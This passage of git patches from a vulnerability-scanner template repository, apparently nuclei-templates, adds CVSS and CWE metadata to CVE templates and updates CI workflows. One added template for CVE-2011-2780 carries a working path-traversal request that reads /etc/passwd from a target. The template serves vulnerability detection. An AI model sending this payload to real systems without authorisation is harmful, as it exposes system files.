cve,cve2021,expressjs,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2021-32820 + cwe-id: CWE-200 + description: "Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability." requests: - method: GET diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index ae2f69e33a..801f92c40d 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -8,6 +8,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass tags: cve,cve2021,zyxel,auth-bypass,router + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2021-3297 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml index b64016ff6a..9b713950a9 100644 --- a/cves/2021/CVE-2021-33221.yaml +++ b/cves/2021/CVE-2021-33221.yaml @@ -5,8 +5,13 @@ info: author: geeknik description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf - severity: medium + severity: critical tags: cve,cve2021,commscope,ruckus,debug + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33221 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2021/CVE-2021-33564.yaml b/cves/2021/CVE-2021-33564.yaml index a2bbd5d431..b6b1e0781e 100644 --- a/cves/2021/CVE-2021-33564.yaml +++ b/cves/2021/CVE-2021-33564.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/ tags: cve,cve2021,rce,ruby + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33564 + cwe-id: CWE-88 + description: "An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility." requests: - method: GET diff --git a/cves/2021/CVE-2021-3374.yaml b/cves/2021/CVE-2021-3374.yaml index a337b419ae..8446f3f830 100644 --- a/cves/2021/CVE-2021-3374.yaml +++ b/cves/2021/CVE-2021-3374.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak severity: medium tags: cve,cve2021,rstudio,traversal + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-3374 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 1b44686e3e..58c38c5802 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -9,6 +9,11 @@ info: author: geeknik severity: medium tags: cve,cve2021,xss,npm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-3377 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index f39c826555..80215a832b 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -10,6 +10,11 @@ info: via insecure POST request. It has been tested on version 4.4.2.2 in Windows 10 Enterprise. tags: cve,cve2021,fortilogger,fortigate,fortinet + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3378 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml index 7ffb782090..4cee9b0a73 100644 --- a/cves/2021/CVE-2021-33807.yaml +++ b/cves/2021/CVE-2021-33807.yaml @@ -9,6 +9,11 @@ info: - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 tags: cve,cve2021,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-33807 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-33904.yaml b/cves/2021/CVE-2021-33904.yaml index cdb7130cd7..1e62c84265 100644 --- a/cves/2021/CVE-2021-33904.yaml +++ b/cves/2021/CVE-2021-33904.yaml @@ -7,6 +7,11 @@ info: reference: https://www.exploit-db.com/exploits/49980 severity: medium tags: cve,cve2021,accela,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-33904 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-34370.yaml b/cves/2021/CVE-2021-34370.yaml index a920b1c540..0e34c5c406 100644 --- a/cves/2021/CVE-2021-34370.yaml +++ b/cves/2021/CVE-2021-34370.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-34370 - https://www.accela.com/civic-platform/ tags: xss,redirect,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-34370 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml index 726f1cffae..fa1c651a3a 100644 --- a/cves/2021/CVE-2021-34429.yaml +++ b/cves/2021/CVE-2021-34429.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-34429 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index 5a10ae6168..68a4fd2b38 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -11,6 +11,10 @@ info: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 tags: cve,cve2021,ssrf,rce,exchange + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34473 requests: - method: GET diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml index 9a97a4f4e5..4362823530 100644 --- a/cves/2021/CVE-2021-34621.yaml +++ b/cves/2021/CVE-2021-34621.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin tags: cve,cve2021,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34621 + cwe-id: CWE-269 + description: "A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. ." requests: - raw: diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index f3e3f41ee9..a7800fd3ac 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2021,openam,rce,java reference: - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-35464 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml index 7030f465af..afdeff9e10 100644 --- a/cves/2021/CVE-2021-36380.yaml +++ b/cves/2021/CVE-2021-36380.yaml @@ -8,6 +8,11 @@ info: reference: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ tags: cve,cve2021,sureline,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-36380 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-37216.yaml b/cves/2021/CVE-2021-37216.yaml index 33de2b4095..de96cad6d0 100644 --- a/cves/2021/CVE-2021-37216.yaml +++ b/cves/2021/CVE-2021-37216.yaml @@ -10,6 +10,11 @@ info: reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html severity: medium tags: cve,cve2021,xss,qsan + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37216 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml index 758e66491c..c7327b670e 100644 --- a/cves/2021/CVE-2021-37538.yaml +++ b/cves/2021/CVE-2021-37538.yaml @@ -3,12 +3,17 @@ id: CVE-2021-37538 info: name: PrestaShop SmartBlog SQL Injection author: whoever - severity: high + severity: critical description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality. tags: cve,cve2021,prestashop,smartblog,sqli reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538 - https://blog.sorcery.ie/posts/smartblog_sqli/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-37538 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml index 6c9c42fe15..aa50dba941 100644 --- a/cves/2021/CVE-2021-37573.yaml +++ b/cves/2021/CVE-2021-37573.yaml @@ -7,6 +7,12 @@ info: reference: - https://seclists.org/fulldisclosure/2021/Aug/13 tags: cve,cve2021,xss,tjws + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37573 + cwe-id: CWE-79 + description: "A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page" requests: - method: GET diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index f9424b16b2..cefb540971 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml @@ -3,12 +3,17 @@ id: CVE-2021-37704 info: name: phpfastcache phpinfo exposure author: whoever - severity: low + severity: medium description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. tags: cve,cve2021,exposure,phpfastcache reference: https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2021-37704 + cwe-id: CWE-668 requests: - method: GET diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml index c17a52845f..cf51a9d3b3 100644 --- a/cves/2021/CVE-2021-38702.yaml +++ b/cves/2021/CVE-2021-38702.yaml @@ -7,6 +7,11 @@ info: description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. reference: https://seclists.org/fulldisclosure/2021/Aug/20 tags: cve,cve2021,cyberoam,netgenie,xss,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-38702 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 209200dcb3..f65c7095ad 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -13,6 +13,11 @@ info: - https://github.com/exponentcms/exponent-cms/issues/1544 - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 tags: cve,cve2021,exponentcms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2021-38751 + cwe-id: CWE-116 requests: - method: GET From 8b31e0d006d16296c987f5aa05632bcc2c9dd56c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:41:35 +0530 Subject: [PATCH 136/339] Added CVE Annotation workflow --- .github/workflows/cve-annotate.yaml | 45 +++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 .github/workflows/cve-annotate.yaml diff --git a/.github/workflows/cve-annotate.yaml b/.github/workflows/cve-annotate.yaml new file mode 100644 index 0000000000..d29ea24563 --- /dev/null +++ b/.github/workflows/cve-annotate.yaml @@ -0,0 +1,45 @@ +name: ✍🏻 CVE Annotate + +on: + pull_request: + branches: + - master + workflow_dispatch: + +jobs: + docs: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@master + with: + persist-credentials: false + fetch-depth: 0 + token: ${{ secrets.GITHUB_TOKEN }} + + - uses: actions/setup-go@v2 + with: + go-version: 1.17 + + - name: Generate CVE Annotations + id: cve-annotate + run: | + if ! which cve-annotate > /dev/null; then + echo -e "Command cve-annotate not found! Installing\c" + go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev + fi + cve-annotate -i ./cves/ -d . + echo "::set-output name=changes::$(git status -s | wc -l)" + + - name: Commit files + if: steps.cve-annotate.outputs.changes > 0 + run: | + git config --local user.email "action@github.com" + git config --local user.name "GitHub Action" + git add cves + git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a + + - name: Push changes + if: steps.cve-annotate.outputs.changes > 0 + uses: ad-m/github-push-action@master + with: + github_token: ${{ secrets.GITHUB_TOKEN }} From 68abf454eb163a21324cf0e914fb011e323fd226 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:47:08 +0530 Subject: [PATCH 137/339] misc update --- .github/workflows/template-validate.yml | 13 +++++-------- .github/workflows/templates-stats.yml | 17 +++++------------ 2 files changed, 10 insertions(+), 20 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index d0d3ede28e..95e3f9a597 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -6,13 +6,10 @@ jobs: build: runs-on: ubuntu-latest steps: - - name: Checkout Repo - uses: actions/checkout@master - - - name: Setup golang - uses: actions/setup-go@v2 - with: - go-version: 1.14 + - uses: actions/checkout@master + - uses: actions/setup-go@v2 + with: + go-version: 1.17 #- name: Cache Go # id: cache-go @@ -26,7 +23,7 @@ jobs: env: GO111MODULE: on run: | - go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev shell: bash - name: Template Validation diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 3fbb305a96..db02a5df05 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -11,21 +11,14 @@ jobs: runs-on: ubuntu-latest if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master' steps: - - name: Checkout Repo - uses: actions/checkout@master - with: - fetch-depth: 0 - - - name: Setup golang - uses: actions/setup-go@v2 - with: - go-version: 1.14 + - uses: actions/checkout@master + - uses: actions/setup-go@v2 + with: + go-version: 1.17 - name: Installing Template Stats - env: - GO111MODULE: on run: | - go get -v github.com/projectdiscovery/templates-stats@main + go install github.com/projectdiscovery/templates-stats@main shell: bash - name: Markdown Stats From a9d3acdd3d70efdf02f60e9f30e7482e87e0ac36 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:48:49 +0530 Subject: [PATCH 138/339] Update cve-annotate.yaml --- .github/workflows/cve-annotate.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/cve-annotate.yaml b/.github/workflows/cve-annotate.yaml index d29ea24563..bb66805d9f 100644 --- a/.github/workflows/cve-annotate.yaml +++ b/.github/workflows/cve-annotate.yaml @@ -15,9 +15,9 @@ jobs: persist-credentials: false fetch-depth: 0 token: ${{ secrets.GITHUB_TOKEN }} - + - uses: actions/setup-go@v2 - with: + with: go-version: 1.17 - name: Generate CVE Annotations From cde816535ae6d9b4acab9470008663762ae9912c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 17:50:25 +0530 Subject: [PATCH 139/339] misc update --- .github/workflows/{cve-annotate.yaml => cve-annotate.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename .github/workflows/{cve-annotate.yaml => cve-annotate.yml} (100%) diff --git a/.github/workflows/cve-annotate.yaml b/.github/workflows/cve-annotate.yml similarity index 100% rename from .github/workflows/cve-annotate.yaml rename to .github/workflows/cve-annotate.yml From 38c66ed681285b478d81fb6dc29f0337b90e9a37 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 10 Sep 2021 20:27:44 +0700 Subject: [PATCH 140/339] Create CVE-2011-2780.yaml --- cves/2011/CVE-2011-2780.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2011/CVE-2011-2780.yaml diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml new file mode 100644 index 0000000000..db72d7955c --- /dev/null +++ b/cves/2011/CVE-2011-2780.yaml @@ -0,0 +1,31 @@ +id: CVE-2011-2780 + +info: + name: Chyrp 2.x - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/35946 + - https://www.cvedetails.com/cve/CVE-2011-2780 + tags: cve,cve2011,lfi + classification: + cvss-score: 5.0 + cve-id: CVE-2011-2780 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 63eabba7583529c769af4a711c4350c1d6aac832 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 22:51:07 +0530 Subject: [PATCH 141/339] Update cve-annotate.yml --- .github/workflows/cve-annotate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index bb66805d9f..754b772885 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -25,7 +25,7 @@ jobs: run: | if ! which cve-annotate > /dev/null; then echo -e "Command cve-annotate not found! Installing\c" - go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev + go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@master fi cve-annotate -i ./cves/ -d . echo "::set-output name=changes::$(git status -s | wc -l)" From e4c3490a28f1b8674b57557b3ca6481456dddc86 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 22:51:33 +0530 Subject: [PATCH 142/339] Update template-validate.yml --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 95e3f9a597..89bd02fd49 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -23,7 +23,7 @@ jobs: env: GO111MODULE: on run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@master shell: bash - name: Template Validation From ec4a1cf38dd42e67262f3557caccf74b5eba2004 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 22:54:45 +0530 Subject: [PATCH 143/339] testing automation --- cves/2011/CVE-2011-2780.yaml | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml index db72d7955c..d57a2e90e1 100644 --- a/cves/2011/CVE-2011-2780.yaml +++ b/cves/2011/CVE-2011-2780.yaml @@ -4,15 +4,7 @@ info: name: Chyrp 2.x - Local File Inclusion (LFI) author: daffainfo severity: high - description: Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/35946 - - https://www.cvedetails.com/cve/CVE-2011-2780 - tags: cve,cve2011,lfi - classification: - cvss-score: 5.0 - cve-id: CVE-2011-2780 - cwe-id: CWE-22 + tags: cve,cve2011,lfi,chyrp requests: - method: GET From 76c7234ca042afec00b592c59c6890be8b03501f Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 23:11:34 +0530 Subject: [PATCH 144/339] Update cve-annotate.yml --- .github/workflows/cve-annotate.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 754b772885..9a81739780 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -43,3 +43,4 @@ jobs: uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} + branch: ${{ github.ref }} From ca9d4a136e5250999c790a14736d7d130a23282b Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 10 Sep 2021 23:30:36 +0530 Subject: [PATCH 145/339] dev update --- .github/workflows/cve-annotate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/cve-annotate.yml b/.github/workflows/cve-annotate.yml index 9a81739780..8e0fd3c94d 100644 --- a/.github/workflows/cve-annotate.yml +++ b/.github/workflows/cve-annotate.yml @@ -25,7 +25,7 @@ jobs: run: | if ! which cve-annotate > /dev/null; then echo -e "Command cve-annotate not found! Installing\c" - go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@master + go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev fi cve-annotate -i ./cves/ -d . echo "::set-output name=changes::$(git status -s | wc -l)" From c41f64987b28967b298fe9d985f3b50f5f1f4a83 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Fri, 10 Sep 2021 17:18:15 -0300 Subject: [PATCH 146/339] Update wordpress-db-repair.yaml Solves this false positive (different encoding) nuclei -debug -t nuclei-templates/vulnerabilities/wordpress/wordpress-db-repair.yaml -u https://try.walmart.com <p><code>define('WP_ALLOW_REPAIR', true); --- vulnerabilities/wordpress/wordpress-db-repair.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-db-repair.yaml b/vulnerabilities/wordpress/wordpress-db-repair.yaml index c3c2709096..6cf8668d0b 100644 --- a/vulnerabilities/wordpress/wordpress-db-repair.yaml +++ b/vulnerabilities/wordpress/wordpress-db-repair.yaml @@ -24,5 +24,8 @@ requests: - type: word words: - - "define('WP_ALLOW_REPAIR', true);" - negative: true \ No newline at end of file + - "define" + - "WP_ALLOW_REPAIR" + - "true" + condition: and + negative: true From 80702f0451172e42bc54e06b1a09ddcf08e852ea Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Sat, 11 Sep 2021 02:24:37 -0300 Subject: [PATCH 147/339] Create carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 27 +++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 technologies/carestream-vue-detect.yaml diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml new file mode 100644 index 0000000000..db87a0e67e --- /dev/null +++ b/technologies/carestream-vue-detect.yaml @@ -0,0 +1,27 @@ +id: carestream-vue-detect + +info: + name: CARESTREAM Vue Motion Detector + author: philippedelteil + severity: info + description: This template will detect a running CARESTREAM Vue Motion instance + references: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf + +requests: + - method: GET + path: + - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" + - "{{BaseURL}}/portal/favicon.ico" + redirects: true + stop-at-first-match: true + max-redirects: 2 + matchers: + - type: dsl + name: "MyVueHelp" + dsl: + - "status_code==200 && (\"84054196570ecd7526894ccb6e7c5c6e\" == md5(body))" + + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" From 5582e890a14ad1f392448b43ec7b890c30ca1cbb Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:16:55 +0530 Subject: [PATCH 148/339] pre-commit-config update --- .github/workflows/template-validate.yml | 4 ++-- .pre-commit-config.yaml => .pre-commit-config.yml | 0 .yamllint | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) rename .pre-commit-config.yaml => .pre-commit-config.yml (100%) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 89bd02fd49..e1e189c35b 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -28,6 +28,6 @@ jobs: - name: Template Validation run: | - nuclei -validate -t . -exclude .pre-commit-config.yaml - nuclei -validate -w ./workflows -exclude .pre-commit-config.yaml + nuclei -validate -t . + nuclei -validate -w ./workflows shell: bash \ No newline at end of file diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yml similarity index 100% rename from .pre-commit-config.yaml rename to .pre-commit-config.yml diff --git a/.yamllint b/.yamllint index 681c2959c0..ddcf63b7b7 100644 --- a/.yamllint +++ b/.yamllint @@ -2,7 +2,7 @@ extends: default ignore: | - .pre-commit-config.yaml + .pre-commit-config.yml .github/workflows/*.yml rules: From c2e651272cb35a8e651ed60b692ac98097279e76 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 11 Sep 2021 12:22:12 +0530 Subject: [PATCH 149/339] Update carestream-vue-detect.yaml --- technologies/carestream-vue-detect.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/technologies/carestream-vue-detect.yaml b/technologies/carestream-vue-detect.yaml index db87a0e67e..989eceab43 100644 --- a/technologies/carestream-vue-detect.yaml +++ b/technologies/carestream-vue-detect.yaml @@ -1,27 +1,30 @@ id: carestream-vue-detect info: - name: CARESTREAM Vue Motion Detector + name: CARESTREAM Vue Motion Detector author: philippedelteil severity: info description: This template will detect a running CARESTREAM Vue Motion instance references: https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf + tags: tech,myvuehelp requests: - method: GET path: - - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" - "{{BaseURL}}/portal/favicon.ico" + - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" + redirects: true stop-at-first-match: true max-redirects: 2 + matchers-condition: or matchers: - type: dsl - name: "MyVueHelp" + name: "myvuehelp" dsl: - - "status_code==200 && (\"84054196570ecd7526894ccb6e7c5c6e\" == md5(body))" + - 'status_code==200 && ("84054196570ecd7526894ccb6e7c5c6e" == md5(body))' - type: dsl - name: "favicon" + name: 